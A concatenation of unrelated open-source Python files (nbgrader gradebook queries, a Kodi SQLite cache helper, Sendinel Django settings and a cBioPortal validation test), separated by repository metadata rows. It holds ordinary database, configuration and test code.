notebook = self.find_notebook(notebook, assignment)
solution_cell = SolutionCell(name=name, notebook=notebook, **kwargs)
self.db.add(solution_cell)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return solution_cell
def find_solution_cell(self, name, notebook, assignment):
"""Find a solution cell in a particular notebook of an assignment.
Parameters
----------
name : string
the name of the solution cell
notebook : string
the name of the notebook
assignment : string
the name of the assignment
Returns
-------
solution_cell : :class:`~nbgrader.api.SolutionCell`
"""
try:
solution_cell = self.db.query(SolutionCell)\
.join(Notebook, Notebook.id == SolutionCell.notebook_id)\
.join(Assignment, Assignment.id == Notebook.assignment_id)\
.filter(SolutionCell.name == name, Notebook.name == notebook, Assignment.name == assignment)\
.one()
except NoResultFound:
raise MissingEntry("No such solution cell: {}/{}/{}".format(assignment, notebook, name))
return solution_cell
def update_or_create_solution_cell(self, name, notebook, assignment, **kwargs):
"""Update an existing solution cell in a notebook of an assignment, or
create the solution cell if it does not exist.
Parameters
----------
name : string
the name of the solution cell
notebook : string
the name of the notebook
assignment : string
the name of the assignment
`**kwargs`
additional keyword arguments for :class:`~nbgrader.api.SolutionCell`
Returns
-------
solution_cell : :class:`~nbgrader.api.SolutionCell`
"""
try:
solution_cell = self.find_solution_cell(name, notebook, assignment)
except MissingEntry:
solution_cell = self.add_solution_cell(name, notebook, assignment, **kwargs)
else:
for attr in kwargs:
setattr(solution_cell, attr, kwargs[attr])
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
raise InvalidEntry(*e.args)
return solution_cell
#### Source cells
def add_source_cell(self, name, notebook, assignment, **kwargs):
"""Add a new source cell to an existing notebook of an existing
assignment.
Parameters
----------
name : string
the name of the new source cell
notebook : string
the name of an existing notebook
assignment : string
the name of an existing assignment
`**kwargs`
additional keyword arguments for :class:`~nbgrader.api.SourceCell`
Returns
-------
source_cell : :class:`~nbgrader.api.SourceCell`
"""
notebook = self.find_notebook(notebook, assignment)
source_cell = SourceCell(name=name, notebook=notebook, **kwargs)
self.db.add(source_cell)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return source_cell
def find_source_cell(self, name, notebook, assignment):
"""Find a source cell in a particular notebook of an assignment.
Parameters
----------
name : string
the name of the source cell
notebook : string
the name of the notebook
assignment : string
the name of the assignment
Returns
-------
source_cell : :class:`~nbgrader.api.SourceCell`
"""
try:
source_cell = self.db.query(SourceCell)\
.join(Notebook, Notebook.id == SourceCell.notebook_id)\
.join(Assignment, Assignment.id == Notebook.assignment_id)\
.filter(SourceCell.name == name, Notebook.name == notebook, Assignment.name == assignment)\
.one()
except NoResultFound:
raise MissingEntry("No such source cell: {}/{}/{}".format(assignment, notebook, name))
return source_cell
def update_or_create_source_cell(self, name, notebook, assignment, **kwargs):
"""Update an existing source cell in a notebook of an assignment, or
create the source cell if it does not exist.
Parameters
----------
name : string
the name of the source cell
notebook : string
the name of the notebook
assignment : string
the name of the assignment
`**kwargs`
additional keyword arguments for :class:`~nbgrader.api.SourceCell`
Returns
-------
source_cell : :class:`~nbgrader.api.SourceCell`
"""
try:
source_cell = self.find_source_cell(name, notebook, assignment)
except MissingEntry:
source_cell = self.add_source_cell(name, notebook, assignment, **kwargs)
else:
for attr in kwargs:
setattr(source_cell, attr, kwargs[attr])
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
raise InvalidEntry(*e.args)
return source_cell
#### Submissions
def add_submission(self, assignment, student, **kwargs):
"""Add a new submission of an assignment by a student.
This method not only creates the high-level submission object, but also
mirrors the entire structure of the existing assignment. Thus, once this
method has been called, the new submission exists and is completely
ready to be filled in with grades and comments.
Parameters
----------
assignment : string
the name of an existing assignment
student : string
the name of an existing student
`**kwargs`
additional keyword arguments for :class:`~nbgrader.api.SubmittedAssignment`
Returns
-------
submission : :class:`~nbgrader.api.SubmittedAssignment`
"""
if 'timestamp' in kwargs:
kwargs['timestamp'] = utils.parse_utc(kwargs['timestamp'])
try:
submission = SubmittedAssignment(
assignment=self.find_assignment(assignment),
student=self.find_student(student),
**kwargs)
for notebook in submission.assignment.notebooks:
nb = SubmittedNotebook(notebook=notebook, assignment=submission)
for grade_cell in notebook.grade_cells:
Grade(cell=grade_cell, notebook=nb)
for solution_cell in notebook.solution_cells:
Comment(cell=solution_cell, notebook=nb)
self.db.add(submission)
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return submission
def find_submission(self, assignment, student):
"""Find a student's submission for a given assignment.
Parameters
----------
assignment : string
the name of an assignment
student : string
the unique id of a student
Returns
-------
submission : :class:`~nbgrader.api.SubmittedAssignment`
"""
try:
submission = self.db.query(SubmittedAssignment)\
.join(Assignment, Assignment.id == SubmittedAssignment.assignment_id)\
.join(Student, Student.id == SubmittedAssignment.student_id)\
.filter(Assignment.name == assignment, Student.id == student)\
.one()
except NoResultFound:
raise MissingEntry("No such submission: {} for {}".format(
assignment, student))
return submission
def update_or_create_submission(self, assignment, student, **kwargs):
"""Update an existing submission of an assignment by a given student,
or create a new submission if it doesn't exist.
See :func:`~nbgrader.api.Gradebook.add_submission` for additional
details.
Parameters
----------
assignment : string
the name of an existing assignment
student : string
the name of an existing student
`**kwargs`
additional keyword arguments for :class:`~nbgrader.api.SubmittedAssignment`
Returns
-------
submission : :class:`~nbgrader.api.SubmittedAssignment`
"""
try:
submission = self.find_submission(assignment, student)
except MissingEntry:
submission = self.add_submission(assignment, student, **kwargs)
else:
for attr in kwargs:
if attr == 'timestamp':
setattr(submission, attr, utils.parse_utc(kwargs[attr]))
else:
setattr(submission, attr, kwargs[attr])
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return submission
def remove_submission(self, assignment, student):
"""Removes a submission from the database.
Parameters
----------
assignment : string
the name of an assignment
student : string
the name of a student
"""
submission = self.find_submission(assignment, student)
for notebook in submission.notebooks:
self.remove_submission_notebook(notebook.name, assignment, student)
self.db.delete(submission)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
def remove_submission_notebook(self, notebook, assignment, student):
"""Removes a submitted notebook from the database.
Parameters
----------
notebook : string
the name of a notebook
assignment : string
the name of an assignment
student : string
the name of a student
"""
submission = self.find_submission_notebook(notebook, assignment, student)
for grade in submission.grades:
self.db.delete(grade)
for comment in submission.comments:
self.db.delete(comment)
self.db.delete(submission)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
def assignment_submissions(self, assignment):
"""Find all submissions of a given assignment.
Parameters
----------
assignment : string
the name of an assignment
Returns
-------
submissions : list
A list of :class:`~nbgrader.api.SubmittedAssignment` objects
"""
return self.db.query(SubmittedAssignment)\
.join(Assignment, Assignment.id == SubmittedAssignment.assignment_id)\
.filter(Assignment.name == assignment)\
.all()
def notebook_submissions(self, notebook, assignment):
"""Find all submissions of a given notebook in a given assignment.
Parameters
----------
notebook : string
the name of an assignment
assignment : string
the name of an assignment
Returns
-------
submissions : list
A list of :class:`~nbgrader.api.SubmittedNotebook` objects
"""
return self.db.query(SubmittedNotebook)\
.join(Notebook, Notebook.id == SubmittedNotebook.notebook_id)\
.join(SubmittedAssignment, SubmittedAssignment.id == SubmittedNotebook.assignment_id)\
.join(Assignment, Assignment.id == SubmittedAssignment.assignment_id)\
.filter(Notebook.name == notebook, Assignment.name == assignment)\
.all()
def student_submissions(self, student):
"""Find all submissions by a given student.
Parameters
----------
student : string
the student's unique id
Returns
-------
submissions : list
A list of :class:`~nbgrader.api.SubmittedAssignment` objects
"""
return self.db.query(SubmittedAssignment)\
.join(Student, Student.id == SubmittedAssignment.student_id)\
.filter(Student.id == student)\
.all()
def find_submission_notebook(self, notebook, assignment, student):
"""Find a particular notebook in a student's submission for a given
assignment.
Parameters
----------
notebook : string
the name of a notebook
assignment : string
the name of an assignment
student : string
the unique id of a student
Returns
-------
notebook : :class:`~nbgrader.api.SubmittedNotebook`
"""
try:
notebook = self.db.query(SubmittedNotebook)\
.join(Notebook, Notebook.id == SubmittedNotebook.notebook_id)\
.join(SubmittedAssignment, SubmittedAssignment.id == SubmittedNotebook.assignment_id)\
.join(Assignment, Assignment.id == SubmittedAssignment.assignment_id)\
.join(Student, Student.id == SubmittedAssignment.student_id)\
.filter(
Notebook.name == notebook,
Assignment.name == assignment,
Student.id == student)\
.one()
except NoResultFound:
raise MissingEntry("No such submitted notebook: {}/{} for {}".format(
assignment, notebook, student))
return notebook
def find_submission_notebook_by_id(self, notebook_id):
"""Find a submitted notebook by its unique id.
Parameters
----------
notebook_id : string
the unique id of the submitted notebook
Returns
-------
notebook : :class:`~nbgrader.api.SubmittedNotebook`
"""
try:
notebook = self.db.query(SubmittedNotebook)\
.filter(SubmittedNotebook.id == notebook_id)\
.one()
except NoResultFound:
raise MissingEntry("No such submitted notebook: {}".format(notebook_id))
return notebook
def find_grade(self, grade_cell, notebook, assignment, student):
"""Find a particular grade in a notebook in a student's submission
for a given assignment.
Parameters
----------
grade_cell : string
the name of a grade cell
notebook : string
the name of a notebook
assignment : string
the name of an assignment
student : string
the unique id of a student
Returns
-------
grade : :class:`~nbgrader.api.Grade`
"""
try:
grade = self.db.query(Grade)\
.join(GradeCell, GradeCell.id == Grade.cell_id)\
.join(SubmittedNotebook, SubmittedNotebook.id == Grade.notebook_id)\
.join(Notebook, Notebook.id == SubmittedNotebook.notebook_id)\
.join(SubmittedAssignment, SubmittedAssignment.id == SubmittedNotebook.assignment_id)\
.join(Assignment, Assignment.id == SubmittedAssignment.assignment_id)\
.join(Student, Student.id == SubmittedAssignment.student_id)\
.filter(
GradeCell.name == grade_cell,
Notebook.name == notebook,
Assignment.name == assignment,
Student.id == student)\
.one()
except NoResultFound:
raise MissingEntry("No such grade: {}/{}/{} for {}".format(
assignment, notebook, grade_cell, student))
return grade
def find_grade_by_id(self, grade_id):
"""Find a grade by its unique id.
Parameters
----------
grade_id : string
the unique id of the grade
Returns
-------
grade : :class:`~nbgrader.api.Grade`
"""
try:
grade = self.db.query(Grade).filter(Grade.id == grade_id).one()
except NoResultFound:
raise MissingEntry("No such grade: {}".format(grade_id))
return grade
def find_comment(self, solution_cell, notebook, assignment, student):
"""Find a particular comment in a notebook in a student's submission
for a given assignment.
Parameters
----------
solution_cell : string
the name of a solution cell
notebook : string
the name of a notebook
assignment : string
the name of an assignment
student : string
the unique id of a student
Returns
-------
comment : :class:`~nbgrader.api.Comment`
"""
try:
comment = self.db.query(Comment)\
.join(SolutionCell, SolutionCell.id == Comment.cell_id)\
.join(SubmittedNotebook, SubmittedNotebook.id == Comment.notebook_id)\
.join(Notebook, Notebook.id == SubmittedNotebook.notebook_id)\
.join(SubmittedAssignment, SubmittedAssignment.id == SubmittedNotebook.assignment_id)\
.join(Assignment, Assignment.id == SubmittedAssignment.assignment_id)\
.join(Student, Student.id == SubmittedAssignment.student_id)\
.filter(
SolutionCell.name == solution_cell,
Notebook.name == notebook,
Assignment.name == assignment,
Student.id == student)\
.one()
except NoResultFound:
raise MissingEntry("No such comment: {}/{}/{} for {}".format(
assignment, notebook, solution_cell, student))
return comment
def find_comment_by_id(self, comment_id):
"""Find a comment by its unique id.
Parameters
----------
comment_id : string
the unique id of the comment
Returns
-------
comment : :class:`~nbgrader.api.Comment`
"""
try:
comment = self.db.query(Comment).filter(Comment.id == comment_id).one()
except NoResultFound:
raise MissingEntry("No such comment: {}".format(comment_id))
return comment
def average_assignment_score(self, assignment_id):
"""Compute the average score for an assignment.
Parameters
----------
assignment_id : string
the name of the assignment
Returns
-------
score : float
The average score
"""
assignment = self.find_assignment(assignment_id)
if assignment.num_submissions == 0:
return 0.0
score_sum = self.db.query(func.coalesce(func.sum(Grade.score), 0.0))\
.join(GradeCell, Notebook, Assignment)\
.filter(Assignment.name == assignment_id).scalar()
return score_sum / assignment.num_submissions
def average_assignment_code_score(self, assignment_id):
"""Compute the average code score for an assignment.
Parameters
----------
assignment_id : string
the name of the assignment
Returns
-------
score : float
The average code score
"""
assignment = self.find_assignment(assignment_id)
if assignment.num_submissions == 0:
return 0.0
score_sum = self.db.query(func.coalesce(func.sum(Grade.score), 0.0))\
.join(GradeCell, Notebook, Assignment)\
.filter(and_(
Assignment.name == assignment_id,
Notebook.assignment_id == Assignment.id,
GradeCell.notebook_id == Notebook.id,
Grade.cell_id == GradeCell.id,
GradeCell.cell_type == "code")).scalar()
return score_sum / assignment.num_submissions
def average_assignment_written_score(self, assignment_id):
"""Compute the average written score for an assignment.
Parameters
----------
assignment_id : string
the name of the assignment
Returns
-------
score : float
The average written score
"""
assignment = self.find_assignment(assignment_id)
if assignment.num_submissions == 0:
return 0.0
score_sum = self.db.query(func.coalesce(func.sum(Grade.score), 0.0))\
.join(GradeCell, Notebook, Assignment)\
.filter(and_(
Assignment.name == assignment_id,
Notebook.assignment_id == Assignment.id,
GradeCell.notebook_id == Notebook.id,
Grade.cell_id == GradeCell.id,
GradeCell.cell_type == "markdown")).scalar()
return score_sum / assignment.num_submissions
def average_notebook_score(self, notebook_id, assignment_id):
"""Compute the average score for a particular notebook in an assignment.
Parameters
----------
notebook_id : string
the name of the notebook
assignment_id : string
the name of the assignment
Returns
-------
score : float
The average notebook score
"""
notebook = self.find_notebook(notebook_id, assignment_id)
if notebook.num_submissions == 0:
return 0.0
score_sum = self.db.query(func.coalesce(func.sum(Grade.score), 0.0))\
.join(SubmittedNotebook, Notebook, Assignment)\
.filter(and_(
Notebook.name == notebook_id,
Assignment.name == assignment_id)).scalar()
return score_sum / notebook.num_submissions
def average_notebook_code_score(self, notebook_id, assignment_id):
"""Compute the average code score for a particular notebook in an
assignment.
Parameters
----------
notebook_id : string
the name of the notebook
assignment_id : string
the name of the assignment
Returns
-------
score : float
The average notebook code score
"""
notebook = self.find_notebook(notebook_id, assignment_id)
if notebook.num_submissions == 0:
return 0.0
score_sum = self.db.query(func.coalesce(func.sum(Grade.score), 0.0))\
.join(GradeCell, Notebook, Assignment)\
.filter(and_(
Notebook.name == notebook_id,
Assignment.name == assignment_id,
Notebook.assignment_id == Assignment.id,
GradeCell.notebook_id == Notebook.id,
Grade.cell_id == GradeCell.id,
GradeCell.cell_type == "code")).scalar()
return score_sum / notebook.num_submissions
def average_notebook_written_score(self, notebook_id, assignment_id):
"""Compute the average written score for a particular notebook in an
assignment.
Parameters
----------
notebook_id : string
the name of the notebook
assignment_id : string
the name of the assignment
Returns
-------
score : float
The average notebook written score
"""
notebook = self.find_notebook(notebook_id, assignment_id)
if notebook.num_submissions == 0:
return 0.0
score_sum = self.db.query(func.coalesce(func.sum(Grade.score), 0.0))\
.join(GradeCell, Notebook, Assignment)\
.filter(and_(
Notebook.name == notebook_id,
Assignment.name == assignment_id,
Notebook.assignment_id == Assignment.id,
GradeCell.notebook_id == Notebook.id,
Grade.cell_id == GradeCell.id,
GradeCell.cell_type == "markdown")).scalar()
return score_sum / notebook.num_submissions
def student_dicts(self):
"""Returns a list of dictionaries containing student data. Equivalent
to calling :func:`~nbgrader.api.Student.to_dict` for each student,
except that this method is implemented using proper SQL joins and is
much faster.
Returns
-------
students : list
A list of dictionaries, one per student
"""
# subquery the scores
scores = self.db.query(
Student.id,
func.sum(Grade.score).label("score")
).join(SubmittedAssignment, SubmittedNotebook, Grade)\
.group_by(Student.id)\
.subquery()
# full query
students = self.db.query(
Student.id, Student.first_name, Student.last_name,
Student.email, func.coalesce(scores.c.score, 0.0),
func.sum(GradeCell.max_score)
).outerjoin(scores, Student.id == scores.c.id)\
.group_by(Student.id)\
.all()
keys = ["id", "first_name", "last_name", "email", "score", "max_score"]
return [dict(zip(keys, x)) for x in students]
def notebook_submission_dicts(self, notebook_id, assignment_id):
"""Returns a list of dictionaries containing submission data. Equivalent
to calling :func:`~nbgrader.api.SubmittedNotebook.to_dict` for each
submission, except that this method is implemented using proper SQL
joins and is much faster.
Parameters
----------
notebook_id : string
the name of the notebook
assignment_id : string
the name of the assignment
Returns
-------
submissions : list
A list of dictionaries, one per submitted notebook
"""
# subquery the code scores
code_scores = self.db.query(
SubmittedNotebook.id,
func.sum(Grade.score).label("code_score"),
func.sum(GradeCell.max_score).label("max_code_score"),
).join(SubmittedAssignment, Notebook, Assignment, Student, Grade, GradeCell)\
.filter(GradeCell.cell_type == "code")\
.group_by(SubmittedNotebook.id)\
.subquery()
# subquery for the written scores
written_scores = self.db.query(
SubmittedNotebook.id,
func.sum(Grade.score).label("written_score"),
func.sum(GradeCell.max_score).label("max_written_score"),
).join(SubmittedAssignment, Notebook, Assignment, Student, Grade, GradeCell)\
.filter(GradeCell.cell_type == "markdown")\
.group_by(SubmittedNotebook.id)\
.subquery()
# subquery for needing manual grading
manual_grade = self.db.query(
SubmittedNotebook.id,
exists().where(Grade.needs_manual_grade).label("needs_manual_grade")
).join(SubmittedAssignment, Assignment, Notebook)\
.filter(
Grade.notebook_id == SubmittedNotebook.id,
Grade.needs_manual_grade)\
.group_by(SubmittedNotebook.id)\
.subquery()
# subquery for failed tests
failed_tests = self.db.query(
SubmittedNotebook.id,
exists().where(Grade.failed_tests).label("failed_tests")
).join(SubmittedAssignment, Assignment, Notebook)\
.filter(
Grade.notebook_id == SubmittedNotebook.id,
Grade.failed_tests)\
.group_by(SubmittedNotebook.id)\
.subquery()
# full query
submissions = self.db.query(
SubmittedNotebook.id, Notebook.name, Student.id,
func.sum(Grade.score), func.sum(GradeCell.max_score),
code_scores.c.code_score, code_scores.c.max_code_score,
written_scores.c.written_score, written_scores.c.max_written_score,
func.coalesce(manual_grade.c.needs_manual_grade, False),
func.coalesce(failed_tests.c.failed_tests, False),
SubmittedNotebook.flagged
).join(SubmittedAssignment, Notebook, Assignment, Student, Grade, GradeCell)\
.outerjoin(code_scores, SubmittedNotebook.id == code_scores.c.id)\
.outerjoin(written_scores, SubmittedNotebook.id == written_scores.c.id)\
.outerjoin(manual_grade, SubmittedNotebook.id == manual_grade.c.id)\
.outerjoin(failed_tests, SubmittedNotebook.id == failed_tests.c.id)\
.filter(and_(
Notebook.name == notebook_id,
Assignment.name == assignment_id,
Student.id == SubmittedAssignment.student_id,
SubmittedAssignment.id == SubmittedNotebook.assignment_id,
SubmittedNotebook.id == Grade.notebook_id,
GradeCell.id == Grade.cell_id))\
.group_by(Student.id)\
.all()
keys = [
"id", "name", "student",
"score", "max_score",
"code_score", "max_code_score",
"written_score", "max_written_score",
"needs_manual_grade",
"failed_tests", "flagged"
]
return [dict(zip(keys, x)) for x in submissions]
| bsd-3-clause | -7,452,875,962,685,538,000 | 33.431348 | 109 | 0.607026 | false | 4.415136 | false | false | false |
allefilmskijken/afk | script.module.image_cache/lib/local_lib/db_utils.py | 1 | 3832 | """
Image Cache Module
Copyright (C) 2016 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import json
from sqlite3 import dbapi2 as db_lib
def __enum(**enums):
return type('Enum', (), enums)
DB_TYPES = __enum(MYSQL='mysql', SQLITE='sqlite')
class DBCache(object):
def __init__(self, db_path=None):
self.db_path = '../tmdb_cache.db' if db_path is None else db_path
self.db_type = DB_TYPES.SQLITE
self.db = db_lib.connect(self.db_path)
self.db.text_factory = str
self.__execute('CREATE TABLE IF NOT EXISTS api_cache (tmdb_id INTEGER NOT NULL, object_type CHAR(1) NOT NULL, data VARCHAR(255), PRIMARY KEY(tmdb_id, object_type))')
self.__execute('CREATE TABLE IF NOT EXISTS db_info (setting VARCHAR(255), value TEXT, PRIMARY KEY(setting))')
def close(self):
self.db.close()
def update_movie(self, tmdb_id, js_data):
self.__update_object(tmdb_id, 'M', js_data)
def get_movie(self, tmdb_id):
return self.__get_object(tmdb_id, 'M')
def get_tvshow(self, tmdb_id):
return self.__get_object(tmdb_id, 'T')
def get_person(self, tmdb_id):
return self.__get_object(tmdb_id, 'P')
def __get_object(self, tmdb_id, object_type):
sql = 'SELECT data from api_cache where tmdb_id = ? and object_type=?'
rows = self.__execute(sql, (tmdb_id, object_type))
if rows:
return json.loads(rows[0][0])
else:
return {}
def update_tvshow(self, tmdb_id, js_data):
self.__update_object(tmdb_id, 'T', js_data)
def update_person(self, tmdb_id, js_data):
self.__update_object(tmdb_id, 'P', js_data)
def __update_object(self, tmdb_id, object_type, js_data):
self.__execute('REPLACE INTO api_cache (tmdb_id, object_type, data) values (?, ?, ?)', (tmdb_id, object_type, json.dumps(js_data)))
def get_setting(self, setting):
sql = 'SELECT value FROM db_info WHERE setting=?'
rows = self.__execute(sql, (setting,))
if rows:
return rows[0][0]
def set_setting(self, setting, value):
sql = 'REPLACE INTO db_info (setting, value) VALUES (?, ?)'
self.__execute(sql, (setting, value))
def execute(self, sql, params=None):
return self.__execute(sql, params)
def __execute(self, sql, params=None):
if params is None: params = []
rows = None
sql = self.__format(sql)
is_read = self.__is_read(sql)
cur = self.db.cursor()
cur.execute(sql, params)
if is_read:
rows = cur.fetchall()
cur.close()
self.db.commit()
return rows
# apply formatting changes to make sql work with a particular db driver
def __format(self, sql):
if self.db_type == DB_TYPES.MYSQL:
sql = sql.replace('?', '%s')
if self.db_type == DB_TYPES.SQLITE:
if sql[:7] == 'REPLACE':
sql = 'INSERT OR ' + sql
return sql
def __is_read(self, sql):
fragment = sql[:6].upper()
return fragment[:6] == 'SELECT' or fragment[:4] == 'SHOW'
| gpl-2.0 | 8,710,367,638,605,920,000 | 35.150943 | 173 | 0.595251 | false | 3.628788 | false | false | false |
Sendinel/Sendinel | sendinel/settings.py | 1 | 5769 | import logging
from datetime import timedelta
from os.path import abspath, dirname
# Django settings for sendinel project.
DEBUG = True #for scheduling set to false
TEMPLATE_DEBUG = DEBUG
PROJECT_PATH = dirname(abspath(__file__))
LOGGING_LEVEL = logging.INFO
LOGGING_LEVEL_TEST = logging.CRITICAL
ADMINS = (
)
MANAGERS = ADMINS
DATABASE_ENGINE = 'sqlite3' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
DATABASE_NAME = PROJECT_PATH + '/sendinel.db' # Or path to database file if using sqlite3.
DATABASE_USER = '' # Not used with sqlite3.
DATABASE_PASSWORD = '' # Not used with sqlite3.
DATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.
DATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'Europe/Berlin'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
_ = lambda s: s
#LANGUAGES = (
# ('de', _('German')),
# ('en', _('English')),
# ('ts', _('Shangaan')),
# ('zh', _('Test Language')),
#)
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = PROJECT_PATH + '/media'
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/mediaweb/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/admin_media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = '4ztf1p=e9d*ns^d*f@bs3mu#37p)$jp(%lzo2a+-%j8^=eq852'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
# 'django.template.loaders.eggs.load_template_source',
)
TEMPLATE_CONTEXT_PROCESSORS = ("django.core.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.contrib.messages.context_processors.messages")
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.csrf.middleware.CsrfMiddleware'
)
ROOT_URLCONF = 'sendinel.urls'
TEMPLATE_DIRS = (
PROJECT_PATH + "/templates",
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'sendinel',
'sendinel.web',
'sendinel.backend',
'sendinel.groups',
'sendinel.infoservices',
'sendinel.notifications',
'sendinel.medicines'
)
####################################
# Sendinel Configuration
REMINDER_TIME_BEFORE_APPOINTMENT = timedelta(days = 1)
DEFAULT_APPOINTMENT_DURATION = timedelta(minutes = 60)
DEFAULT_HOSPITAL_NAME = 'your hospital'
DEFAULT_SEND_TIME = '12:00' #hh:mm in 24-hours format
COUNTRY_CODE_PHONE = "0049" #"0027" for South Africa
START_MOBILE_PHONE = "0" # "0" for South Africa (07/08..), "01" for Germany
# see http://en.wikipedia.org/wiki/Telephone_numbers_in_South_Africa
# TODO multiple mobile prefixes
ASTERISK_USER = "sendinel"
ASTERISK_GROUP = "sendinel"
ASTERISK_SPOOL_DIR = "/var/spool/asterisk/outgoing/"
ASTERISK_DONE_SPOOL_DIR = "/var/spool/asterisk/outgoing_done/"
ASTERISK_RETRY = 5
ASTERISK_RETRY_TIME = 5
# to or of authentication
# and to turn it on and off again ss
ASTERISK_DATACARD = True
ASTERISK_EXTENSION = "s"
ASTERISK_SIP_ACCOUNT = "datacard0"
#ASTERISK_SIP_ACCOUNT = "ext-sip-account"
# Specify a COM Port for SMS
# for windows maybe it starts at 0
SERIALPORTSMS = '/dev/rfcomm0'
# FESTIVAL_CACHE = "/lib/init/rw"
FESTIVAL_CACHE = "/tmp"
# Phonenumber to authenticate against the system
AUTH_NUMBER = "CHANGE ME"
# time a user has to call the system to authenticate
AUTHENTICATION_CALL_TIMEOUT = timedelta(minutes = 3)
# True or False to turn authentication on or off
AUTHENTICATION_ENABLED = False
# enable Bluetooth as a Way of Communication
BLUETOOTH_ENABLED = True
# Salutation for all SMS
# TODO the count of characters has to be subtracted from "Characters Left:"
SMS_SALUTATION = ''
# Salutation for phone calls
CALL_SALUTATION = "This is an automated call from your clinic"
# Template for Medicine Notification Messages
MEDICINE_MESSAGE_TEMPLATE = "Your medicine is now available " + \
"at the $hospital. Please come and pick it up."
# used for marking the vcal uid
VCAL_UID_SLUG = 'sendinel.org'
####################################
# Setup Local_Settings if present
try:
from local_settings import *
except ImportError:
pass
| mit | -7,652,383,964,260,054,000 | 30.697802 | 108 | 0.704802 | false | 3.363848 | false | false | false |
pughlab/cbioportal | core/src/test/scripts/system_tests_validate_studies.py | 3 | 7336 | #!/usr/bin/env python3
"""
Copyright (c) 2018 The Hyve B.V.
This code is licensed under the GNU Affero General Public License (AGPL),
version 3, or (at your option) any later version.
"""
import unittest
import sys
import os
import glob
from contextlib import contextmanager
from io import StringIO
import logging.handlers
import tempfile
import shutil
from importer import validateStudies, cbioportal_common
# globals:
PORTAL_INFO_DIR = 'test_data/api_json_system_tests'
# FIXME: replace by contextlib.redirect_stdout when moving to Python 3.4+
@contextmanager
def redirect_stdout(new_target):
"""Temporarily re-bind sys.stdout to a different file-like object."""
old_target = sys.stdout
sys.stdout = new_target
try:
yield
finally:
sys.stdout = old_target
# FIXME: replace by tempfile.TemporaryDirectory when moving to Python 3.2+
@contextmanager
def TemporaryDirectory():
"""Create a temporary directory and remove it after use."""
path = tempfile.mkdtemp()
try:
yield path
finally:
shutil.rmtree(path)
class ValidateStudiesSystemTester(unittest.TestCase):
"""Test cases around running the validateStudies script
(such as "does it return the correct exit status?")
"""
def test_exit_status_success(self):
"""study 0 : no errors, expected exit_status = 0.
Possible exit statuses:
0: 'VALID',
1: 'INVALID'
"""
# Build up arguments and run
print("===study 0")
args = ['--list-of-studies', 'test_data/study_es_0/',
'--portal_info_dir', PORTAL_INFO_DIR]
args = validateStudies.interface(args)
exit_status = validateStudies.main(args)
self.assertEqual(0, exit_status)
def test_exit_status_failure(self):
"""study 1 : errors, expected exit_status = 1."""
# Build up arguments and run
print("===study 1")
args = ['--list-of-studies', 'test_data/study_es_1/',
'--portal_info_dir', PORTAL_INFO_DIR]
args = validateStudies.interface(args)
exit_status = validateStudies.main(args)
self.assertEqual(1, exit_status)
def test_exit_status_invalid(self):
"""test to fail: study directory not existing, so cannot run validation, expected exit_status = 1."""
# Build up arguments and run
print("===study invalid")
args = ['--list-of-studies', 'test_data/study_es_invalid/',
'--portal_info_dir', PORTAL_INFO_DIR]
args = validateStudies.interface(args)
exit_status = validateStudies.main(args)
self.assertEqual(1, exit_status)
def test_exit_status_warnings(self):
"""study 3 : warnings only, expected exit_status = 0."""
# Build up arguments and run
print("===study 3")
args = ['--list-of-studies', 'test_data/study_es_3/',
'--portal_info_dir', PORTAL_INFO_DIR]
args = validateStudies.interface(args)
exit_status = validateStudies.main(args)
self.assertEqual(0, exit_status)
def test_exit_status_multiple_studies(self):
"""Running validateStudies for four studies tested above, expected exit_status = 1."""
# Build up arguments and run
print("===study0,1,invalid,3")
